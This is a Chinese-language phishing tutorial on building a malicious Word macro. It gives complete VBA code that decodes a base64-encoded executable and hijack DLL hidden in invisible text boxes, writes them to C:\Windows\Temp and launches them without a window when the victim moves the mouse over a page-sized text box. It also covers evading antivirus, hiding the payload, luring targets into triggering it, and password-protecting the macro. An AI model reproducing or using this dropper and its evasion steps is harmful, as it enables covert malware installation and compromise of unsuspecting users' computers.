实战 | 钓鱼与社工系列之office宏

Delina

原文链接：实战 | 钓鱼与社工系列之office宏
​
0x01 介绍
根据多次项目实战中发现，office宏仍然是最高的成功率，在静默钓鱼中也是最不容易触发人员的警觉。因为大部分员工即使有安全意识，也是不运行陌生的exe程序，但是对于word文档则没有足够的安全意识，认为word文档都是安全的。正是基于此心理状态，office宏在钓鱼中仍然占据重要成分。
当然，现在office在国内市场中其实占据并不多，越来越多人用wps了。那么这种情况下office宏肯定是无效了，下篇文章会针对该情景分析如何钓鱼。
0x02 宏代码流程及免杀网上有很多项目及文章是如何实现宏免杀的效果，之所以要宏免杀大部分原因都是代码是实现运行宏的时候就直接远程上线到rat上。例如调用powershell或者远程下载等等代码所用到的api或者函数，都被杀软盯着。那么换个思路，我们即不调用powershell执行敏感函数，也不远程下载文件，我们所做要的是释放文件并通过dll劫持实现上线。
释放文件其实也是个技术活，经过测试，能否释放文件成功主要看你的文件是不是静态免杀，如果文件静态免杀，那么就能够成功释放。因为这就是个正常的功能，杀软不可能拦截你释放安全的文件，不然就影响一些职业的正常办公了。而我们用的是dll劫持的方法，白名单程序肯定是安全的文件，那么就是我们的恶意dll文件如何实现静态免杀了。如何让dll文件静态免杀的方法很多，网上也有很多项目，这块内容不在该文章里，以后会详细讲解。
上段说了释放文件，而文件也都静态免杀了。那么还有一个要注意的地方，那就是dll劫持的程序保存在word文件哪里？首先我们得将dll劫持程序已二进制形式读取出来，然后base64编码后得到了一串字符串，只要释放的时候重新base64解码并已二进制形式写入到磁盘里，这样就能够释放出dll劫持程序了。那么重点就是该base64字符串存放在哪里？千万别放在宏代码里，很容易被杀，最好的规避杀软的方法就是将base64字符串放到word正文里的文本框等控件里。然后宏代码去读取文本框里的base64字符串，再解码写入磁盘里并运行白程序实现上线。这样通过该方法就能够实现了宏免杀。
最后一步就是如何触发宏了，千万不要使用打开word文件就触发宏的方法，很容易被杀软拦截。我常用的方法就是弄一个很大的文本框放在第一页，然后当目标的鼠标移动到文本框时就触发宏。这样的方法既能有效规避杀软，还能在目标不知情的情况下触发了宏！
总结：寻找一个dll劫持的白程序，做一个静态免杀的dll文件，将所有文件以二进制形式读取出来并base64编码后存放到word的文本框里。宏代码功能读取文本框里的字符串并解码写入磁盘，然后运行白程序即可免杀上线！
0x03 宏代码0x03-1 读取文件并base64编码先使用下面的代码将白程序和dll文件base64编码得到字符串

1. Sub WriteBinary(FileName, Buf)
   
2.   Dim I, aBuf, Size, bStream
   
3.   Size = UBound(Buf): ReDim aBuf(Size \ 2)
   
4.   For I = 0 To Size - 1 Step 2
   
5.       aBuf(I \ 2) = ChrW(Buf(I + 1) * 256 + Buf(I))
   
6.   Next
   
7.   If I = Size Then aBuf(I \ 2) = ChrW(Buf(I))
   
8.   aBuf = Join(aBuf, "")
   
9.   Set bStream = CreateObject("ADODB.Stream")
   
10.   bStream.Type = 1: bStream.Open
    
11.   With CreateObject("ADODB.Stream")
    
12.     .Type = 2: .Open: .WriteText aBuf
    
13.     .Position = 2: .CopyTo bStream: .Close
    
14.   End With
    
15.   bStream.SaveToFile FileName, 2: bStream.Close
    
16.   Set bStream = Nothing
    
17. End Sub
    
18. 
    
19. Function Base64Encode(str() As Byte) As String                                  'Base64 编码
    
20.     On Error GoTo over                                                          '排错
    
21.     Dim Buf() As Byte, length As Long, mods As Long
    
22.     Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
    
23.     mods = (UBound(str) + 1) Mod 3   '除以3的余数
    
24.     length = UBound(str) + 1 - mods
    
25.     ReDim Buf(length / 3 * 4 + IIf(mods <> 0, 4, 0) - 1)
    
26.     Dim I As Long
    
27.     For I = 0 To length - 1 Step 3
    
28.         Buf(I / 3 * 4) = (str(I) And &HFC) / &H4
    
29.         Buf(I / 3 * 4 + 1) = (str(I) And &H3) * &H10 + (str(I + 1) And &HF0) / &H10
    
30.         Buf(I / 3 * 4 + 2) = (str(I + 1) And &HF) * &H4 + (str(I + 2) And &HC0) / &H40
    
31.         Buf(I / 3 * 4 + 3) = str(I + 2) And &H3F
    
32.     Next
    
33.     If mods = 1 Then
    
34.         Buf(length / 3 * 4) = (str(length) And &HFC) / &H4
    
35.         Buf(length / 3 * 4 + 1) = (str(length) And &H3) * &H10
    
36.         Buf(length / 3 * 4 + 2) = 64
    
37.         Buf(length / 3 * 4 + 3) = 64
    
38.     ElseIf mods = 2 Then
    
39.         Buf(length / 3 * 4) = (str(length) And &HFC) / &H4
    
40.         Buf(length / 3 * 4 + 1) = (str(length) And &H3) * &H10 + (str(length + 1) And &HF0) / &H10
    
41.         Buf(length / 3 * 4 + 2) = (str(length + 1) And &HF) * &H4
    
42.         Buf(length / 3 * 4 + 3) = 64
    
43.     End If
    
44.     For I = 0 To UBound(Buf)
    
45.         Base64Encode = Base64Encode + Mid(B64_CHAR_DICT, Buf(I) + 1, 1)
    
46.     Next
    
47. over:
    
48. End Function
    
49. 
    
50. 
    
51. 'VB Base64 解码/解密函数：
    
52. 
    
53. Function Base64Decode(B64 As String) As Byte()                                  'Base64 解码
    
54.     On Error GoTo over                                                          '排错
    
55.     Dim OutStr() As Byte, I As Long, j As Long
    
56.     Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
    
57.     If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)     '判断Base64真实长度,除去补位
    
58.     Dim length As Long, mods As Long
    
59.     mods = Len(B64) Mod 4
    
60.     length = Len(B64) - mods
    
61.     ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
    
62.     For I = 1 To length Step 4
    
63.         Dim Buf(3) As Byte
    
64.         For j = 0 To 3
    
65.             Buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, I + j, 1)) - 1            '根据字符的位置取得索引值
    
66.         Next
    
67.         OutStr((I - 1) / 4 * 3) = Buf(0) * &H4 + (Buf(1) And &H30) / &H10
    
68.         OutStr((I - 1) / 4 * 3 + 1) = (Buf(1) And &HF) * &H10 + (Buf(2) And &H3C) / &H4
    
69.         OutStr((I - 1) / 4 * 3 + 2) = (Buf(2) And &H3) * &H40 + Buf(3)
    
70.     Next
    
71.     If mods = 2 Then
    
72.         OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    
73.     ElseIf mods = 3 Then
    
74.         OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    
75.         OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
    
76.     End If
    
77.     Base64Decode = OutStr                                                       '读取解码结果
    
78. over:
    
79. End Function
    
80. 
    
81. 
    
82. Sub test2()
    
83.     Dim iFN As Integer
    
84.     Dim sPath As String
    
85.     Dim bFileSize As Long
    
86.     Dim sResult As String
    
87.     Dim arr() As Byte       ' 字节数组
    
88.     Dim arra() As Byte       ' 字节数组
    
89.     Dim infile, outfile, infileBase As String
    
90.     infile = "C:\Windows\Temp\123.exe"
    
91.     outfile = "c:\windows\temp\1.exe"
    
92. 
    
93.     iFN = VBA.FreeFile
    
94. 
    
95.     bFileSize = VBA.FileLen(infile)
    
96.     'Debug.Print bFileSize
    
97.     Open infile For Binary Access Read As iFN
    
98.     arr = InputB(bFileSize, iFN)        '读取字节流
    
99. 
    
100.     infileBase = Base64Encode(arr())
     
101. 
     
102.     'Debug.Print infileBase
     
103. 
     
104.     Dim FSO
     
105.     Set FSO = CreateObject("Scripting.FileSystemObject")
     
106. 
     
107.     Set OutPutFile = FSO.OpenTextFile("C:\windows\temp\test.txt", 2, True)
     
108.     OutPutFile.Write (infileBase)
     
109.     OutPutFile.Close
     
110.     Set FSO = Nothing
     
111. 
     
112. 
     
113.     'Dim infileBaseExe As String
     
114.     'infileBaseExe = Range("J22").Value
     
115.     'infileBaseExe = infileBaseExe + Range("J23").Value
     
116. 
     
117.     'arra = Base64Decode(infileBase)
     
118. 
     
119.     'WriteBinary outfile, arra
     
120. 
     
121. 
     
122. End Sub

复制代码

0x03-2 office宏上线代码从文本框中读取base64内容，解码后写入到c:\windows\temp\目录下，当用户鼠标移动或点击到文本框中，触发宏执行木马

1. Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
   
2. Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
   
3. Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
   
4. Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
   
5. Private Declare PtrSafe Sub ByteSwapper Lib "kernel32.dll" Alias "RtlFillMemory" (Destination As Any, ByVal length As Long, ByVal Fill As Byte)
   
6. Private Declare PtrSafe Sub Peek Lib "msvcrt" Alias "memcpy" (ByRef pDest As Any, ByRef pSource As Any, ByVal nBytes As Long)
   
7. Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
   
8. Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" (ByVal dwAccess As Long, ByVal fInherit As Integer, ByVal hObject As Long) As Long
   
9. Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
   
10. Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    
11. 
    
12. Private Type PROCESS_INFORMATION
    
13.     hProcess As Long
    
14.     hThread As Long
    
15.     dwProcessId As Long
    
16.     dwThreadId As Long
    
17. End Type
    
18. 
    
19. Private Type STARTUPINFO
    
20.     cb As Long
    
21.     lpReserved As String
    
22.     lpDesktop As String
    
23.     lpTitle As String
    
24.     dwX As Long
    
25.     dwY As Long
    
26.     dwXSize As Long
    
27.     dwYSize As Long
    
28.     dwXCountChars As Long
    
29.     dwYCountChars As Long
    
30.     dwFillAttribute As Long
    
31.     dwFlags As Long
    
32.     wShowWindow As Integer
    
33.     cbReserved2 As Integer
    
34.     lpReserved2 As Long
    
35.     hStdInput As Long
    
36.     hStdOutput As Long
    
37.     hStdError As Long
    
38. End Type
    
39. 
    
40. Const CREATE_NO_WINDOW = &H8000000
    
41. Const CREATE_NEW_CONSOLE = &H10
    
42. 
    
43. Function fileExist(filePath)
    
44.     Dim fso
    
45.     Set fso = CreateObject("Scripting.FileSystemObject")
    
46.     If fso.fileExists(filePath) Then
    
47.         fileExist = True
    
48.     Else
    
49.         fileExist = False
    
50.     End If
    
51.     Set fso = Nothing
    
52. End Function
    
53. 
    
54. 
    
55. Function dddddd(B64 As String) As Byte()
    
56.     On Error GoTo over
    
57.     Dim OutStr() As Byte, i As Long, j As Long
    
58.     Const B64_CHAR_DICT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
    
59.     If InStr(1, B64, "=") <> 0 Then B64 = Left(B64, InStr(1, B64, "=") - 1)
    
60.     Dim length As Long, mods As Long
    
61.     mods = Len(B64) Mod 4
    
62.     length = Len(B64) - mods
    
63.     ReDim OutStr(length / 4 * 3 - 1 + Switch(mods = 0, 0, mods = 2, 1, mods = 3, 2))
    
64.     For i = 1 To length Step 4
    
65.         Dim buf(3) As Byte
    
66.         For j = 0 To 3
    
67.             buf(j) = InStr(1, B64_CHAR_DICT, Mid(B64, i + j, 1)) - 1
    
68.         Next
    
69.         OutStr((i - 1) / 4 * 3) = buf(0) * &H4 + (buf(1) And &H30) / &H10
    
70.         OutStr((i - 1) / 4 * 3 + 1) = (buf(1) And &HF) * &H10 + (buf(2) And &H3C) / &H4
    
71.         OutStr((i - 1) / 4 * 3 + 2) = (buf(2) And &H3) * &H40 + buf(3)
    
72.     Next
    
73.     If mods = 2 Then
    
74.         OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    
75.     ElseIf mods = 3 Then
    
76.         OutStr(length / 4 * 3) = (InStr(1, B64_CHAR_DICT, Mid(B64, length + 1, 1)) - 1) * &H4 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &H30) / 16
    
77.         OutStr(length / 4 * 3 + 1) = ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 2, 1)) - 1) And &HF) * &H10 + ((InStr(1, B64_CHAR_DICT, Mid(B64, length + 3, 1)) - 1) And &H3C) / &H4
    
78.     End If
    
79.     dddddd = OutStr
    
80. over:
    
81. End Function
    
82. 
    
83. 
    
84. Function runCommand(comando)
    
85.     Dim pInfo As PROCESS_INFORMATION
    
86.     Dim sInfo As STARTUPINFO
    
87.     Dim sNull As String
    
88.     Dim lSuccess As Long
    
89.     Dim lRetValue As Long
    
90. 
    
91.     lSuccess = CreateProcess(sNull, comando, ByVal 0&, ByVal 0&, 1&, CREATE_NO_WINDOW, ByVal 0&, sNull, sInfo, pInfo)
    
92. 
    
93.     lRetValue = CloseHandle(pInfo.hThread)
    
94.     lRetValue = CloseHandle(pInfo.hProcess)
    
95. 
    
96. End Function
    
97. 
    
98. 
    
99. Function WriteBinary(FileName, buf)
    
100.   Dim i, aBuf, Size, bStream
     
101.   Size = UBound(buf): ReDim aBuf(Size \ 2)
     
102.   For i = 0 To Size - 1 Step 2
     
103.       aBuf(i \ 2) = ChrW(buf(i + 1) * 256 + buf(i))
     
104.   Next
     
105.   If i = Size Then aBuf(i \ 2) = ChrW(buf(i))
     
106.   aBuf = Join(aBuf, "")
     
107.   Set bStream = CreateObject("ADODB.Stream")
     
108.   bStream.Type = 1: bStream.Open
     
109.   With CreateObject("ADODB.Stream")
     
110.     .Type = 2: .Open: .WriteText aBuf
     
111.     .Position = 2: .CopyTo bStream: .Close
     
112.   End With
     
113.   bStream.SaveToFile FileName, 2: bStream.Close
     
114.   Set bStream = Nothing
     
115. End Function
     
116. 
     
117. 
     
118. Function releaseFile(path As String, conte As String)
     
119. 
     
120.     hwminiArra = dddddd(conte)
     
121.     WriteBinary path, hwminiArra
     
122. 
     
123. 
     
124. 
     
125. End Function
     
126. 
     
127. 
     
128. Function start()
     
129.     Dim filePath As String
     
130.     filePath = "C:\Windows\temp\aaaaaaa.exe"
     
131.     If Not fileExist(filePath) Then
     
132.         releaseFile "C:\Windows\temp\aaaaaaa.exe", Replace(ActiveDocument.Shapes(1).TextFrame.TextRange, Chr(13), Empty)
     
133.         releaseFile "C:\Windows\temp\aaaaaaaaaaa.dll", Replace(ActiveDocument.Shapes(2).TextFrame.TextRange, Chr(13), Empty)
     
134.     End If
     
135.     runCommand (filePath)
     
136. 
     
137. End Function
     
138. 
     
139. 
     
140. 
     
141. 
     
142. Private Sub TextBox2_MouseDown(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
     
143.     Static i As Integer
     
144.     i = i + 1
     
145.     If i < 3 Then
     
146.         start
     
147.     End If
     
148. End Sub
     
149. 
     
150. 
     
151. Private Sub TextBox2_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
     
152.     Static i As Integer
     
153.     i = i + 1
     
154.     If i < 3 Then
     
155.         start
     
156.     End If
     
157. End Sub

复制代码

0x04 隐藏文本框将dll劫持的程序base64编码后存放在文本框里
​
文本框的线条设置为无颜色
​

​

​

将base64字符串的字体设置为白色，

​

将最后一页的最上方空白行删掉，那么这时候就看不到文本框了

​

在首页将触发宏的文本框拉到最大，然后话术诱导目标将鼠标移动或点击文本框

​

0x05 宏代码加密
   为了防止宏代码被分析，可以设置密码。当然这仅仅只是防不懂的人，懂的人还是会用工具解密的。

​

​

​